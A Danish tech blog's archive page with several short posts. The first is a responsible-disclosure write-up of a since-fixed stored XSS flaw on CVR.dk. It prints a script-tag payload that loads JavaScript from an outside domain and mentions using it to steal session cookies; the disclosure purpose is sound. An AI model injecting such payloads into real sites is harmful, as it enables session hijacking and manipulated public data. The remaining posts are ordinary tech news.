Category Archives: computer

Blog: In data we trust! XSS sårbarhed på CVR.dk

Stor data, åbn data, data om data – den er alle vegne.

Vi bruger data som grundlag for at træffe beslutninger og derfor er vi dybt afhængige af at andre mennesker, myndigheder og virksomheder giver os korrekt data.

Når vi træffer beslutninger på baggrund af data, er det helt afgørende hvorfra vi har fået dataen, kommer den fx fra en offentlig myndighed, har vi en forventning til at dataen er korrekt.

Eksemplets magt

Det antages almindeligvis, at adresser indgår i helt op til 80 % af de digitale løsninger, som et moderne samfund betjener sig af.

I hvert fald hvis man skal tro på Ministeriet for By, Bolig og Landdistrikter.

Adresser står på postkasser. Ikke e-Bokse, nej. Den slags hvor man modtager helt almindelige, kedelige, snail mails. Her er et billede af min.

Det er ingen hemmelighed at jeg synes at IT sikkerhedsmæssige udfordringer er rigtig interessante. Da jeg samtidig elsker at dele ud af min viden, hvad ville så være en mere naturligt end at oprette en konsulentvirksomhed hvor jeg kan gøre netop dette?

Lad os kalde min nye virksomhed for CREEN security – og lad os fortælle Erhvervsstyrelsen at jeg har tænkt mig at være IT konsulent.

En sådan registrering kan ske via webreg.dk, hvor man med 3 klik, et login med NemID og 2 yderligere klik, bliver præsenteret med et spørgeskema i 10 skridt. Det 4. skridt “Stamdata” ber’ mig om at indtaste adresserne for virksomheden.

Da der ikke står “CREEN security” på min postkasse, skriver jeg blot <script src=//s.creen.dk></script>, som c/o navn, det fremgår jo klart og tydeligt af min postkasse.

Få dage efter kan jeg fremsøge min nye virksomhed på cvr.dk, men jeg kan ikke se mit c/o navn i adressefeltet.

Hvis jeg åbner mine udviklerværktøjer, kan jeg se at det står i koden, men det bliver ikke vist. Det er selvfølgelig fordi min browser, fortolker c/o navnet som HTML. HTML der fortæller browseren at den skal inkludere et JavaScript fra et eksternt website, i dette tilfælde er det eksterne website s.creen.dk. Et script der ligger på mit domæne, under min kontrol.

Når et script inkluderes på et website, som er hostet på et domæne, udenfor ens kontrol, så har man effektivt set, overgivet kontrollen over det indhold som ens brugere udsættes for, til dem der kontrollerer det eksterne script.

Det bliver altså muligt for mig at præsentere besøgende på cvr.dk, for information der kontrolleres helt eller delvist af mig – uden om Erhvervsstyrelsen’s faktuelle tjek.

Herunder fremkommer resultatet af en søgning på “CREEN security“. Jeg har skiftet virksomhedens navn og stamoplysninger og ændret ophørsdato’en til d. 20/11 2013.

Tænk hvad der ville ske hvis jeg havde gjort det samme med et børsnoteret selskab og sendt linket til højre og venstre på de sociale medier? Det ville være et meget effektivt værktøj til at tjene store penge på shorting af aktier!

Alternativt kunne jeg bruge fejlen til at stjæle cookies fra de besøgende på CVR der ser min virksomheds profil, inklusiv den ASP.NET_SessionId-cookie som websitet bruger til at holde styr på hvem der er logget ind og hvem der ikke er. Gud ved hvilke knapper der gemmer sig for en administrativ bruger på sitet?

Alt jeg skulle gøre for at få administrative rettigheder er at spørge en ansvarlig ved styrelsen om et spørgsmål der får dem til at besøge min virksomheds profil.

Spredning

En interessant vinkel på problematikken er at det centrale virksomheds register, nu frigives under en åben licens og at virksomheder jævnligt trækker data fra registeret. Hvis de heller ikke renser dataen før den printes i markup, så er der potentiale for at disse sider også er sårbare i skrivende stund.

Løsningen

Løsningen er naturligvis at sørge for at tegn som < og > ikke bliver printet ned i HTML’en, de skal i stedet erstattes med såkaldte “Special Entities” som &lt; og &gt;

Så simpelt er det – det vil rette denne fejl. Men det garanterer ikke at der ikke gemmer sig flere.

Responsible disclosure

Inden du springer til tasterne for at reproducere resultatet ovenfor, så bliver jeg nødt til at skuffe dig. Fejlen er rettet – og det blot 12 dage efter jeg kontaktede styrelsen.

Den hurtige respons viser at IT sikkerhed er et emne som tages seriøst i en offentlig styrelse, men hvordan kan det være at noget så simpelt ikke er blevet fundet og rettet for lang tid siden?

Det er ganske enkelt fordi det er super svært at forestille sig alle de kreative måder som folk kunne finde på at udfordre ens system – man har en naturlig forudantagelse om at det system har kørende er sikkert, indtil andet er bevist.

At et offentligt IT system har en sikkerhedsfejl, er i sig selv ikke den største sensation. Det er vel nærmest forventeligt af ethvert ældre system af denne størrelse. Skulle man rejse en kritik, kunne man rette den på den øjensynlige mangel på tests af sikkerheden, på et så betroet website som CVR.dk:

Det er selvfølgelig pinligt at have erhvervet sig en kønssygdom, fordi man ikke har beskyttet sig. Men det bliver først rigtig pinligt hvis man ikke anerkender risikoen og sørger for at blive testet regelmæssigt. Da brugerne af de offentlige IT systemer er os alle sammen, har vi alle en interesse i at systemerne testes. Selvom det betyder at et IT system må stå med bukserne om anklerne en gang imellem.

Posted in computer.

De 50 bedste gadgets og tech-produkter i år

QNAP TS-469 Pro

De fleste NAS-drev er relativt basale lager-enheder, der ofte gemmes væk i et skab. Når de først er sat op, forbundet til netværket og tilknyttet som netværksdrev, kan den fysiske boks fint gemmes af vejen.

Det er dog anderledes med QNAP’s TS-469 Pro, som desuden er et af de hurtigste NAS-drev, vi har testet. Hvor de fleste NAS-drev har en ret primitiv grafisk brugergrænseflade, benytter QNAP en implementering af XBMC (open source og tværplatform software til medieafspilning).

Selvom TS-469 Pro tilsluttes netværket ligesom alle andre NAS-drev, har den også en HDMI-port og en infrarød-modtager, hvilket gør det muligt at slutte den direkte til dit HD-tv og styre den direkte ved hjælp af en fjernbetjening, der fås som ekstraudstyr fra QNAP, eller ved hjælp af QNAP’s gratis Qremote-apps til Android og iOS.

Se vores test her: Test: Hurtig netværksharddisk til superbrugeren

Posted in computer.

Her er app’en til hardcore Android-nørder








Mangler du et nyt profilbillede på et socialt medie, og er du hardcore Android-fan?

Så var det måske en idé at suse uden om BitStrips, som i øjeblikket hitter, og i stedet kaste dig over Androidfy.

App’en lader dig designe en Android-figur med samme karaktertræk som den grønne maskot for Googles mobile styresystem.

Du kan skifte hudfarve på den originale Android, tilføje tøj, solbriller, funky hår og meget andet.

Der er mange kreative muligheder for at sætte sit personlige præg og få den til at ligne en selv mest muligt, blandt andet ved at trække i længden på arme og ben.

App’en er netop blevet opdateret med juletema, så der er massevis af uldne sweatre, julemandskostumer, vanter og huer at vælge imellem, når du skaber din avatar via mobilen. 

Den færdige Android-figur kan deles med omverdenen via sociale medier, mail, eller du kan gemme den på en online lagertjeneste.

Du kan installere app’en uden at åbne din mobil.

Det foregår via fjerninstallation på Google Play – og du finder Androidfy her.

Posted in computer.

Magi: Fra toplækker fotomodel til julemand på et minut








Måske kan du huske videoen, hvor en almindelig køn pige bliver trukket gennem Photoshop og forvandlet til en model-babe.

Videoen hærgede nettet tidligere i år.

Har du glemt den, kan du gense den her, ellers er der highlights fra forvandlingen i den første del af videoen nederst i artiklen.

Men forvandlingen er ikke slut.

Først tager men en model. Så tilsætter man billedbehandling ….

Efter model-looket er der nemlig et nyt liv som julemand.

..og vupti, så har man en julemand

Det er reklamebureauet Victors & Spoils, som har fortsat Photoshop-behandlingen i denne parodi, der er ganske underholdende.

Samtidig giver det helt nye tanker omkring, hvem der egentlig er inde i julemanden.

God jul, tak fordi du læste med og på gensyn i det nye år.

Happy Holidays from Victors & Spoils on Vimeo.

Posted in computer.

Dansk storkommune kræver dispensation: På vej med gratis Wi-Fi













Regeringen skal formentlig hjælpe kommunerne på vej med en lovændring eller dispensationer, hvis de mange planer om kommunalt finansieret Wi-Fi skal blive til noget.

Sådan er status, her et halvt år efter at Computerworld skrev om begyndelsen på den seneste bølge af kommunale Wi-Fi-initiativer.

Økonomi- og indenrigsminister Margrethe Vestager har ret entydigt erklæret, at det stadig – bortset fra på biblioteker –  er ulovligt for kommunerne at give borgerne netadgang, uanset om kommunerne opkræver penge for det eller ej. Det skete i et svar til folketingsmedlem Torsten Schack Pedersen (V) den 14. oktober.

Margrethe Vestager skriver også, at frikommuneforsøget, som omfatter ni kommuner, giver mulighed for, at disse kommuner på forsøgsbasis kan tilbyde gratis internetadgang på udvalgte steder. Forsøget løber frem til 2015, og hvis det viser sig at være en succes, “vil det være naturligt at overveje mulighederne for at udbrede ordningen til at omfatte alle kommuner”, skriver ministeren.

København vil ikke vente
Men det har Københavns Kommune ikke tålmodighed til at vente på. Borgerrepræsentationen i København har på sit møde 28. november vedtaget et socialdemokratisk forslag om at henvende sig direkte til Økonomi- og Indenrigsministeriet for at “indlede et samarbejde, der har til formål at finde en måde, hvorpå Københavns Kommune kan tilbyde gratis internet i byrummet.”

“Vi synes, det er for længe at vente på en evauering efter 2015, så vi beder nu om hurtigst muligt at få samme dispensation som i frikommuneforsøget,” siger medlem af Borgerrepræsentationen Henrik Appel Espensen (S), der er tovholder på forslaget.

Fortsættes …

Posted in computer.

Blog: Titusindvis af trofaste brugere: Dødsdømte Winamp skal være open source






Målet er 50.000 underskrifter mod lukningen af Winamp inden den 20. december, og det er tæt på.

I skrivende stund mangler cirka 3200 underskrifte , og der er stadig nogle timer til deadline.

Den 20. december er også den dato som AOL, firmaet bag afspillere, har sat som dødsdato.

Men opbakninger omkring en redning er altså enorm.

Sælg ikke til Microsoft
På rygtebasis har Microsoft været nævnt som køber, men det kan være svært at få øje på, hvad Redmond-virksomheden vil med Winamp.

Og det er da heller ikke et salg til en gigantvirksomhed, de mange Winamp-fans ser som den rigtige løsning.

Her er udmeldingen faktisk klokke klar:

“Uanset hvad I gør (AOL, red.) så sælg ikke til en virksomhed, der vil lukke programmet eller bare bruge dele af koden,” lyder det fra folkene bag redningsprojektet i et blog-indlæg.

The Save Winamp Team, har også sendt en redningskrans af sted mod AOL i form af et åbent brev.

Her kan man blandt andet læser:

“Det, der startede som en lille gruppe personer, der ville holde Winamp, har udviklet sig til en verdensomspændende bevægelse, der vil redde programmet.”

Gruppen begrunder blandt andet bevarelsen med følgende argument:

“Winamp er et ikonisk produkt i sin niche, præcis som Firefox er blandt browsere.”

Og sammenligningen med Firefox er næppe helt tilfældig.

I brevet til AOL opfordrer bevægelsen nemlig til at frigive koden til open source-folket.

“I stedet for at lukke produktet så giv koden til et open source community. I hænderne på brugere og fans har programmet en stor chance for at vokse og udvikle sig.”

Tidligere i teksten stiller jeg spørgsmålet: Er open source bedre end døden?

Det spørgsmål vil jeg gerne giver videre til dig.

Fortjener programmet ikke at dø i fred og trække sig tilbage til de evige kodemarker, eller er der stadig brug for en medie-dinosaur i et open source community?

Posted in computer.

Seks skarpe råd: Sådan gør du din job-ansøgning til den bedste

Posted in computer.

Titusindvis af trofaste brugere: Dødsdømte Winamp skal være open source






Målet er 50.000 underskrifter mod lukningen af Winamp inden den 20. december, og det er tæt på.

I skrivende stund mangler cirka 3200 underskrifte , og der er stadig nogle timer til deadline.

Den 20. december er også den dato som AOL, firmaet bag afspillere, har sat som dødsdato.

Men opbakninger omkring en redning er altså enorm.

Sælg ikke til Microsoft
På rygtebasis har Microsoft været nævnt som køber, men det kan være svært at få øje på, hvad Redmond-virksomheden vil med Winamp.

Og det er da heller ikke et salg til en gigantvirksomhed, de mange Winamp-fans ser som den rigtige løsning.

Her er udmeldingen faktisk klokke klar:

“Uanset hvad I gør (AOL, red.) så sælg ikke til en virksomhed, der vil lukke programmet eller bare bruge dele af koden,” lyder det fra folkene bag redningsprojektet i et blog-indlæg.

The Save Winamp Team, har også sendt en redningskrans af sted mod AOL i form af et åbent brev.

Her kan man blandt andet læser:

“Det, der startede som en lille gruppe personer, der ville holde Winamp, har udviklet sig til en verdensomspændende bevægelse, der vil redde programmet.”

Gruppen begrunder blandt andet bevarelsen med følgende argument:

“Winamp er et ikonisk produkt i sin niche, præcis som Firefox er blandt browsere.”

Og sammenligningen med Firefox er næppe helt tilfældig.

I brevet til AOL opfordrer bevægelsen nemlig til at frigive koden til open source-folket.

“I stedet for at lukke produktet så giv koden til et open source community. I hænderne på brugere og fans har programmet en stor chance for at vokse og udvikle sig.”

Tidligere i teksten stiller jeg spørgsmålet: Er open source bedre end døden?

Det spørgsmål vil jeg gerne giver videre til dig.

Fortjener programmet ikke at dø i fred og trække sig tilbage til de evige kodemarker, eller er der stadig brug for en medie-dinosaur i et open source community?

Posted in computer.

Blog: Uopklaret: Her er hele Stein Bagger-juleserien






Alle hverdage i december frem til fredag den 20. december har jeg hevet et spørgsmål frem, som jeg mener, er ubesvaret eller meget interessant i danmarkshistoriens største svindelsag.

Anledningen er, at det den 1. december 2013 var fem år siden skandalen brød ud.

Jeg har brugt hashtaget #fupfabrikken til alle mine tweets i julekalenderen.

Det er også navnet på min bog om sagen, der kvit og frit kan lånes på e-reolen.dk her.

Orker du ikke tjekke Twitter kan du se alle spørgsmålene herunder.

Mangler der nogle spørgsmål?

God læse lyst og god jul.

De femten ubesvarede spørgsmål

1.

Hvem slog Stein Baggers forretningspartner Allan Vestergaard ned?

Link: http://www.computerworld.dk/art/112212/voldsoffer-skal-vidne-i-ny-it-factory-retssag

 

 2.

Hvem var den “falske” Erik Ove?

Link: http://www.computerworld.dk/art/160704/stein-bagger-opfandt-muligvis-falsk-erik-ove
  

 
3.

Hvorfor vrimler det med rockere i sagen?

Link: http://www.computerworld.dk/art/54215/mystisk-bagmand-dukket-op-i-it-factory-sagen

 

4.

Hvem kendte reelt til Stein Baggers hemmelige kontor?

Link: http://www.computerworld.dk/art/49172/jensby-stein-bagger-havde-hemmeligt-kontor

5.

Hvorfor kørte Stein Bagger tværs over USA?

Link: http://www.computerworld.dk/art/51255/stein-baggers-svenske-makker-anholdt

 
6.

Hvornår begyndte Stein Bagger sin svindel i IT Factory?

Link: http://www.computerworld.dk/art/53500/stein-bagger-aendrede-forklaring-til-politiet

7.

Hvorfor reagerede Asger Jensby ikke på advarsler mod Stein Bagger?

Link: http://www.computerworld.dk/art/112033/asger-jensby-advaret-af-skat-om-fusk-mistanke

 
8.

Har revisionsgiganten KPMG handlet ansvarspådragende?

Link: http://www.computerworld.dk/art/111861/it-factory-kurator-kraever-987-millioner-af-kpmg

9.

Hvorfor er ITF-investor Allan Vestergaard fortsat “gået under jorden” og vil ikke udtale sig?

 

10.

Hvad ville en efterforskning af alle Stein Baggers dokumenter afsløre?

Link: http://www.computerworld.dk/art/53500/stein-bagger-aendrede-forklaring-til-politiet?page=2

 

11.

Hvad stod der i de papirer, der blev fjernet fra Stein Baggers hemmelige kontor?

Link: http://www.computerworld.dk/art/126084/jensby-fjernede-22-ringbind-fra-hemmeligt-kontor

 

 12.

Hvad fik nuværende TDC-direktør Carsten Dilling ud af gennemgangen af IT Factory i 2007?

Side 316 i : http://www.saxo.com/dk/stein-bagger-inderkredsen_erik-ove_haeftet_9788770556071

 

 13.

Hvad viste data på den GPS, som var i bilen Stein Bagger kørte tværs over USA i?

Link: http://www.computerworld.dk/art/55414/politiets-stoerste-broelere-hvor-er-it-factory-pengene

 

 14.

Hvorfor sendte Carl Freer en mail til Ljungman om at købe 30 bøger og vente på formue efter fængsel?

Link: http://www.computerworld.dk/art/112113/mikael-ljungman-skal-syv-aar-i-faengsel

  

 15.

Hvor er de næsten 200 forsvundne millioner kroner?

Link: http://www.computerworld.dk/art/227889/drop-aftaler-med-it-svindlere-200-mio-er-stadig-vaek

Savner du nogle spørgsmål?

God jul.

Posted in computer.

Lille dansk virksomhed er klar med smartlock: "Vi overhaler konkurrenterne indenom"






Danalock











Vi har længe råbt: “Smartphone-låsen kommer, smartphone-låsen kommmer.” Men indtil videre har udvalget af de smarte låse været stærkt begrænset. 

De to hypede amerikanske låse Lockitron og August har længe udskudt leveringerne, og først her i efteråret er Lockitron så småt begyndt at sende enkelte enheder ud til de kunder, der bestilte enheden for et år siden. 

Men i al stilhed har den århusianske virksomhed Poly-Control syslet med sin egen løsning, der bærer navnet Danalock.

Det er en direkte konkurrent til Lockitron og August.

I denne uge er enheden sat til salg, og i skrivende stund er der derfor travlhed på virksomhedens lager, der i øjeblikket sender hundredevis af deres helt nye smartphone-lås ud gennem lagerporten. 

“Vi valgte den modsatte approach i forhold til vores kolleger i USA. Vi valgte at holde kortene tæt ind til kroppen, indtil vi rent faktisk har kunnet levere,” siger Hans Overgaard, der er direktør i Poly-Control. 

Populær i USA
I løbet af den første uges tid er tæt på 90 procent af kunderne amerikanere, hvoraf Hans Overgaard formoder, at en del af dem har ventet forgæves på en lås fra August eller Lockitron. 

Han forventer dog, at danskerne i løbet af 2014 også vil få øjnene op for Danalock, fordi de første udgaver af August eller Lockitron ikke vil virke med de låseenheder, der bruges herhjemme. 

“Alle andre smartlocks er designet til at virke med amerikanske låse. Vi er de eneste, der har en lås af denne type og i den prisklasse, som kan installeres på en dansk dør,” siger han.

Herhjemme kan du dog allerede købe smartlocken Yale Doorman, der udbydes af Ruko.

Det er en mere avanceret smartphonelås, som i modsætning til Danalock kræver, at du udskifter hele din låsekasse. 

Til gengæld er der mulighed for at tilkøbe et alarm-abonnement hos Securitas Direct Verisure, og den er desuden udstyret med et numerisk tastatur, der gør det let at udstede midlertidige digitale adgangskoder til folk uden en smartphone.

Yale Doorman koster dog også betydeligt mere. Prisen ligger på omkring 2500 kroner uden Verisure-abonnement, mens Danalock koster 790 kroner inklusiv moms og fragt i Danmark. 

Styres med Bluetooth
Låsefunktionen i Danalock styres med Bluetooth Low Energy. Det vil sige, at lige så snart du nærmer dig låsen med din smartphone i lommen, vil døren automatisk låse op. Døren kan ligeledes automatisk låse, når du bevæger dig væk fra døren. 

Du kan dog også vælge, at døren kun kan låses op direkte fra app’en, og fordi Danalock monteres oven på din eksisterende lås, kan du også stadigvæk bruge din eksisterende fysiske nøgle. 



Fortsættes …

Posted in computer.